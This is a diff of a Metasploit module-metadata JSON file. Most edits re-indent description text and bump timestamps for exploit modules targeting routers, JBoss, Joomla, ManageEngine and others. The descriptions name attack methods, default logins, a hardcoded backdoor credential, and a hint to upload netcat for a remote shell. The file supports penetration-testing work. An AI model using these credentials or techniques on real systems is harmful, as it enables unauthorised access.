+    "mod_time": "2022-12-02 16:29:02 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/samr_computer",
@@ -1117,7 +1181,7 @@
      "Jan Trencansky <jan.trencansky@gmail.com>",
      "Lior Oppenheim"
    ],
-    "description": "This module exploits HTTP servers that appear to be vulnerable to the\n        'Misfortune Cookie' vulnerability which affects Allegro Software\n        Rompager versions before 4.34 and can allow attackers to authenticate\n        to the HTTP service as an administrator without providing valid\n        credentials.",
+    "description": "This module exploits HTTP servers that appear to be vulnerable to the\n          'Misfortune Cookie' vulnerability which affects Allegro Software\n          Rompager versions before 4.34 and can allow attackers to authenticate\n          to the HTTP service as an administrator without providing valid\n          credentials.",
    "references": [
      "CVE-2014-9222",
      "URL-https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/",
@@ -1143,7 +1207,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/allegro_rompager_auth_bypass",
@@ -1167,7 +1231,7 @@
    "author": [
      "joev <joev@metasploit.com>"
    ],
-    "description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n        several vulnerabilities that, when combined, allow an arbitrary website to take\n        control of the modem, even if the user is not currently logged in. The attacker\n        must successfully know, or guess, the target's internal gateway IP address.\n        This is usually a default value of 192.168.0.1.\n\n        First, a hardcoded backdoor account was discovered in the source code\n        of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n        in the device's login form, these credentials - along with the default\n        \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n        inadvertently logging the user into the router.\n\n        Once successfully logged in, a persistent XSS vulnerability is\n        exploited in the firewall configuration page. This allows injection of\n        Javascript that can perform any available action in the router interface.\n\n        The following firmware versions have been tested as vulnerable:\n\n        SBG6580-6.5.2.0-GA-06-077-NOSH, and\n        SBG6580-8.6.1.0-GA-04-098-NOSH",
+    "description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n          several vulnerabilities that, when combined, allow an arbitrary website to take\n          control of the modem, even if the user is not currently logged in. The attacker\n          must successfully know, or guess, the target's internal gateway IP address.\n          This is usually a default value of 192.168.0.1.\n\n          First, a hardcoded backdoor account was discovered in the source code\n          of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n          in the device's login form, these credentials - along with the default\n          \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n          inadvertently logging the user into the router.\n\n          Once successfully logged in, a persistent XSS vulnerability is\n          exploited in the firewall configuration page. This allows injection of\n          Javascript that can perform any available action in the router interface.\n\n          The following firmware versions have been tested as vulnerable:\n\n          SBG6580-6.5.2.0-GA-06-077-NOSH, and\n          SBG6580-8.6.1.0-GA-04-098-NOSH",
    "references": [
      "CVE-2015-0964",
      "CVE-2015-0965",
@@ -1184,7 +1248,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
    "is_install_path": true,
    "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -1209,7 +1273,7 @@
      "Zhao Liang",
      "juan vazquez <juan.vazquez@metasploit.com>"
    ],
-    "description": "This module exploits a directory traversal vulnerability in the WebAdmin\n        interface of Axigen, which allows an authenticated user to read and delete\n        arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n        Windows platforms. This module has been tested successfully on Axigen 8.10 over\n        Windows 2003 SP2.",
+    "description": "This module exploits a directory traversal vulnerability in the WebAdmin\n          interface of Axigen, which allows an authenticated user to read and delete\n          arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n          Windows platforms. This module has been tested successfully on Axigen 8.10 over\n          Windows 2003 SP2.",
    "references": [
      "US-CERT-VU-586556",
      "CVE-2012-4940",
@@ -1234,7 +1298,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/axigen_file_access.rb",
    "is_install_path": true,
    "ref_name": "admin/http/axigen_file_access",
@@ -1283,7 +1347,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cfme_manageiq_evm_pass_reset",
@@ -1346,7 +1410,7 @@
    "author": [
      "Karn Ganeshen <KarnGaneshen@gmail.com>"
    ],
-    "description": "Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n        4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n        accessible via a specific url, to any authenticated user. The module uses this\n        shell to execute arbitrary system commands as 'root'.",
+    "description": "Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n          4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n          accessible via a specific url, to any authenticated user. The module uses this\n          shell to execute arbitrary system commands as 'root'.",
    "references": [
      "CVE-2017-5259",
      "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/"
@@ -1370,7 +1434,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cnpilot_r_cmd_exec",
@@ -1394,7 +1458,7 @@
    "author": [
      "Karn Ganeshen <KarnGaneshen@gmail.com>"
    ],
-    "description": "This module exploits a File Path Traversal vulnerability in Cambium\n        cnPilot r200/r201 to read arbitrary files off the file system. Affected\n        versions - 4.3.3-R4 and prior.",
+    "description": "This module exploits a File Path Traversal vulnerability in Cambium\n          cnPilot r200/r201 to read arbitrary files off the file system. Affected\n          versions - 4.3.3-R4 and prior.",
    "references": [
      "CVE-2017-5261",
      "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/"
@@ -1418,7 +1482,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cnpilot_r_fpt",
@@ -1466,7 +1530,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "admin/http/contentkeeper_fileaccess",
@@ -1490,7 +1554,7 @@
    "author": [
      "Michael Messner <devnull@s3cur1ty.de>"
    ],
-    "description": "This module exploits an OS Command Injection vulnerability in some D-Link\n        Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n        command.php, which is accessible without authentication. This module has been\n        tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n        In order to get a remote shell the telnetd could be started without any\n        authentication.",
+    "description": "This module exploits an OS Command Injection vulnerability in some D-Link\n          Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n          command.php, which is accessible without authentication. This module has been\n          tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n          In order to get a remote shell the telnetd could be started without any\n          authentication.",
    "references": [
      "OSVDB-89861",
      "EDB-24453",
@@ -1517,7 +1581,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "admin/http/dlink_dir_300_600_exec_noauth",
@@ -1567,7 +1631,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-10-09 17:06:05 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb",
    "is_install_path": true,
    "ref_name": "admin/http/dlink_dir_645_password_extractor",
@@ -1616,7 +1680,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-10-09 17:06:05 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb",
    "is_install_path": true,
    "ref_name": "admin/http/dlink_dsl320b_password_extractor",
@@ -1668,7 +1732,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/foreman_openstack_satellite_priv_esc",
@@ -1693,7 +1757,7 @@
      "Kacper Szurek",
      "Jacob Robles"
    ],
-    "description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n        The module supports requests for listing users of the application and listing\n        available repositories. Additionally, the module can create a user and add the user\n        to the application's repositories. This module has been tested against GitStack v2.3.10.",
+    "description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n          The module supports requests for listing users of the application and listing\n          available repositories. Additionally, the module can create a user and add the user\n          to the application's repositories. This module has been tested against GitStack v2.3.10.",
    "references": [
      "CVE-2018-5955",
      "EDB-43777",
@@ -1718,7 +1782,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/gitstack_rest.rb",
    "is_install_path": true,
    "ref_name": "admin/http/gitstack_rest",
@@ -1843,7 +1907,7 @@
    "author": [
      "aushack <patrick@osisecurity.com.au>"
    ],
-    "description": "This module abuses a command execution vulnerability within the\n        web based management console of the Hewlett-Packard Web JetAdmin\n        network printer tool v6.2 - v6.5. It is possible to execute commands\n        as SYSTEM without authentication. The vulnerability also affects POSIX\n        systems, however at this stage the module only works against Windows.\n        This module does not apply to HP printers.",
+    "description": "This module abuses a command execution vulnerability within the\n          web based management console of the Hewlett-Packard Web JetAdmin\n          network printer tool v6.2 - v6.5. It is possible to execute commands\n          as SYSTEM without authentication. The vulnerability also affects POSIX\n          systems, however at this stage the module only works against Windows.\n          This module does not apply to HP printers.",
    "references": [
      "OSVDB-5798",
      "BID-10224",
@@ -1868,7 +1932,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/hp_web_jetadmin_exec",
@@ -1919,7 +1983,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/http/ibm_drm_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/ibm_drm_download",
@@ -1927,6 +1991,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -1944,7 +2018,7 @@
      "Soroush Dalili",
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module bypasses basic authentication for Internet Information Services (IIS).\n        By appending the NTFS stream name to the directory name in a request, it is\n        possible to bypass authentication.",
+    "description": "This module bypasses basic authentication for Internet Information Services (IIS).\n          By appending the NTFS stream name to the directory name in a request, it is\n          possible to bypass authentication.",
    "references": [
      "CVE-2010-2731",
      "OSVDB-66160",
@@ -1970,7 +2044,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/iis_auth_bypass",
@@ -2021,7 +2095,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/intersil_pass_reset",
@@ -2069,7 +2143,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb",
    "is_install_path": true,
    "ref_name": "admin/http/iomega_storcenterpro_sessionid",
@@ -2119,7 +2193,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb",
    "is_install_path": true,
    "ref_name": "admin/http/jboss_bshdeployer",
@@ -2169,7 +2243,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb",
    "is_install_path": true,
    "ref_name": "admin/http/jboss_deploymentfilerepository",
@@ -2194,7 +2268,7 @@
      "guerrino di massa",
      "Cristiano Maruti <cmaruti@gmail.com>"
    ],
-    "description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n        4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n        Language (EL) expressions, which allows remote attackers to execute arbitrary code\n        via a crafted URL. This modules also has been tested successfully against IBM\n        WebSphere 6.1 running on iSeries.\n\n        NOTE: this is only a vulnerability when the Java Security Manager is not properly\n        configured.",
+    "description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n          4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n          Language (EL) expressions, which allows remote attackers to execute arbitrary code\n          via a crafted URL. This modules also has been tested successfully against IBM\n          WebSphere 6.1 running on iSeries.\n\n          NOTE: this is only a vulnerability when the Java Security Manager is not properly\n          configured.",
    "references": [
      "CVE-2010-1871",
      "OSVDB-66881"
@@ -2218,7 +2292,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/jboss_seam_exec",
@@ -2244,7 +2318,7 @@
      "Filipe Reis <fr@integrity.pt>",
      "Vitor Oliveira <vo@integrity.pt>"
    ],
-    "description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n        through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).",
+    "description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n          through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).",
    "references": [
      "CVE-2016-8869",
      "CVE-2016-8870",
@@ -2271,7 +2345,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/joomla_registration_privesc",
@@ -2295,7 +2369,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n        Master Administrator account. Normally this page is only accessible via the localhost\n        interface, but the application does nothing to prevent this apart from attempting to\n        force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n        v9.0.0.3.",
+    "description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n          Master Administrator account. Normally this page is only accessible via the localhost\n          interface, but the application does nothing to prevent this apart from attempting to\n          force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n          v9.0.0.3.",
    "references": [
      "CVE-2015-6922",
      "ZDI-15-448",
@@ -2321,7 +2395,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-13 18:47:11 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb",
    "is_install_path": true,
    "ref_name": "admin/http/kaseya_master_admin",
@@ -2370,7 +2444,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/katello_satellite_priv_esc",
@@ -2395,7 +2469,7 @@
      "Pichaya Morimoto",
      "Christian Mehlmauer <FireFart@gmail.com>"
    ],
-    "description": "This module exploits an unauthenticated file download vulnerability\n        in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n        as a ZIP and unzipped automatically, thus binary files can be downloaded.",
+    "description": "This module exploits an unauthenticated file download vulnerability\n          in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n          as a ZIP and unzipped automatically, thus binary files can be downloaded.",
    "references": [
      "URL-https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/",
      "URL-https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015",
@@ -2420,7 +2494,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/limesurvey_file_download",
@@ -2444,7 +2518,7 @@
    "author": [
      "Michael Messner <devnull@s3cur1ty.de>"
    ],
-    "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n        Default credentials for the web interface are admin/admin or admin/password. Since\n        it is a blind os command injection vulnerability, there is no output for the\n        executed command. A ping command against a controlled system for can be used for\n        testing purposes.",
+    "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n          Default credentials for the web interface are admin/admin or admin/password. Since\n          it is a blind os command injection vulnerability, there is no output for the\n          executed command. A ping command against a controlled system for can be used for\n          testing purposes.",
    "references": [
      "OSVDB-89912",
      "BID-57760",
@@ -2470,7 +2544,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/linksys_e1500_e2500_exec",
@@ -2495,7 +2569,7 @@
      "Craig Heffner",
      "Michael Messner <devnull@s3cur1ty.de>"
    ],
-    "description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n        to reset the password of the management interface temporarily to an empty value.\n        This module has been tested successfully on a WRT120N device with firmware version\n        1.0.07.",
+    "description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n          to reset the password of the management interface temporarily to an empty value.\n          This module has been tested successfully on a WRT120N device with firmware version\n          1.0.07.",
    "references": [
      "EDB-31758",
      "OSVDB-103521",
@@ -2520,7 +2594,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb",
    "is_install_path": true,
    "ref_name": "admin/http/linksys_tmunblock_admin_reset_bof",
@@ -2544,7 +2618,7 @@
    "author": [
      "Michael Messner <devnull@s3cur1ty.de>"
    ],
-    "description": "Some Linksys Routers are vulnerable to OS Command injection.\n        You will need credentials to the web interface to access the vulnerable part\n        of the application.\n        Default credentials are always a good starting point. admin/admin or admin\n        and blank password could be a first try.\n        Note: This is a blind OS command injection vulnerability. This means that\n        you will not see any output of your command. Try a ping command to your\n        local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n        Hint: To get a remote shell you could upload a netcat binary and exec it.\n        WARNING: this module will overwrite network and DHCP configuration.",
+    "description": "Some Linksys Routers are vulnerable to OS Command injection.\n          You will need credentials to the web interface to access the vulnerable part\n          of the application.\n          Default credentials are always a good starting point. admin/admin or admin\n          and blank password could be a first try.\n          Note: This is a blind OS command injection vulnerability. This means that\n          you will not see any output of your command. Try a ping command to your\n          local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n          Hint: To get a remote shell you could upload a netcat binary and exec it.\n          WARNING: this module will overwrite network and DHCP configuration.",
    "references": [
      "URL-http://www.s3cur1ty.de/m1adv2013-01",
      "URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl",
@@ -2571,7 +2645,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/linksys_wrt54gl_exec",
@@ -2595,7 +2669,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module exploits an administrator account creation vulnerability in Desktop Central\n        from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n        several versions of Desktop Central (including MSP) from v7 onwards.",
+    "description": "This module exploits an administrator account creation vulnerability in Desktop Central\n          from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n          several versions of Desktop Central (including MSP) from v7 onwards.",
    "references": [
      "CVE-2014-7862",
      "OSVDB-116554",
@@ -2621,7 +2695,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb",
    "is_install_path": true,
    "ref_name": "admin/http/manage_engine_dc_create_admin",
@@ -2645,7 +2719,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module exploits a directory listing information disclosure vulnerability in the\n        FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n        makes a recursive listing, so it will list the whole drive if you ask it to list / in\n        Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n        Applications Manager, but authenticated in IT360. This module will attempt to login\n        using the default credentials for the administrator and guest accounts; alternatively\n        you can provide a pre-authenticated cookie or a username / password combo. For IT360\n        targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n        tested on both Windows and Linux with several different versions. Windows paths have to\n        be escaped with 4 backslashes on the command line. There is a companion module that\n        allows for arbitrary file download. This vulnerability has been fixed in Applications\n        Manager v11.9 b11912 and OpManager 11.6.",
+    "description": "This module exploits a directory listing information disclosure vulnerability in the\n          FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n          makes a recursive listing, so it will list the whole drive if you ask it to list / in\n          Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n          Applications Manager, but authenticated in IT360. This module will attempt to login\n          using the default credentials for the administrator and guest accounts; alternatively\n          you can provide a pre-authenticated cookie or a username / password combo. For IT360\n          targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n          tested on both Windows and Linux with several different versions. Windows paths have to\n          be escaped with 4 backslashes on the command line. There is a companion module that\n          allows for arbitrary file download. This vulnerability has been fixed in Applications\n          Manager v11.9 b11912 and OpManager 11.6.",
    "references": [
      "CVE-2014-7863",
      "OSVDB-117696",
@@ -2671,7 +2745,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb",
    "is_install_path": true,
    "ref_name": "admin/http/manageengine_dir_listing",
@@ -2695,7 +2769,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n        on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n        unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n        module will attempt to login using the default credentials for the administrator and\n        guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n        and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n        8300). This module has been tested on both Windows and Linux with several different\n        versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n        a companion module that allows the recursive listing of any directory. This\n        vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.",
+    "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n          on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n          unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n          module will attempt to login using the default credentials for the administrator and\n          guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n          and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n          8300). This module has been tested on both Windows and Linux with several different\n          versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n          a companion module that allows the recursive listing of any directory. This\n          vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.",
    "references": [
      "CVE-2014-7863",
      "OSVDB-117695",
@@ -2721,7 +2795,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/manageengine_file_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/manageengine_file_download",
@@ -2745,7 +2819,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n        vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n        privileges and obtain Super Administrator access. A Super Administrator can then\n        use his privileges to dump the whole password database in CSV format. PMP can use\n        both MySQL and PostgreSQL databases but this module only exploits the latter as\n        MySQL does not support stacked queries with Java. PostgreSQL is the default database\n        in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n        so a higher version does not guarantee exploitability. This module has been tested\n        on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n        v7.1 build 7105 and above.",
+    "description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n          vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n          privileges and obtain Super Administrator access. A Super Administrator can then\n          use his privileges to dump the whole password database in CSV format. PMP can use\n          both MySQL and PostgreSQL databases but this module only exploits the latter as\n          MySQL does not support stacked queries with Java. PostgreSQL is the default database\n          in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n          so a higher version does not guarantee exploitability. This module has been tested\n          on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n          v7.1 build 7105 and above.",
    "references": [
      "CVE-2014-8499",
      "OSVDB-114485",
@@ -2771,7 +2845,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/manageengine_pmp_privesc",
@@ -2822,7 +2896,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/mantisbt_password_reset",
@@ -2846,7 +2920,7 @@
    "author": [
      "juan vazquez <juan.vazquez@metasploit.com>"
    ],
-    "description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n        appliance. The EditDocument servlet provides file operations, such as copy and\n        delete, which are affected by a directory traversal vulnerability. Because of this,\n        any authenticated frontend user can read and delete arbitrary files from the system\n        with root privileges. In order to exploit the vulnerability a valid user (any role)\n        in the web frontend is required. The module has been tested successfully on the\n        Mutiny 5.0-1.07 appliance.",
+    "description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n          appliance. The EditDocument servlet provides file operations, such as copy and\n          delete, which are affected by a directory traversal vulnerability. Because of this,\n          any authenticated frontend user can read and delete arbitrary files from the system\n          with root privileges. In order to exploit the vulnerability a valid user (any role)\n          in the web frontend is required. The module has been tested successfully on the\n          Mutiny 5.0-1.07 appliance.",
    "references": [
      "CVE-2013-0136",
      "US-CERT-VU-701572",
@@ -2871,7 +2945,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
    "is_install_path": true,
    "ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -2895,7 +2969,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n        on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n        and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n        must escape the backslash with a backslash.",
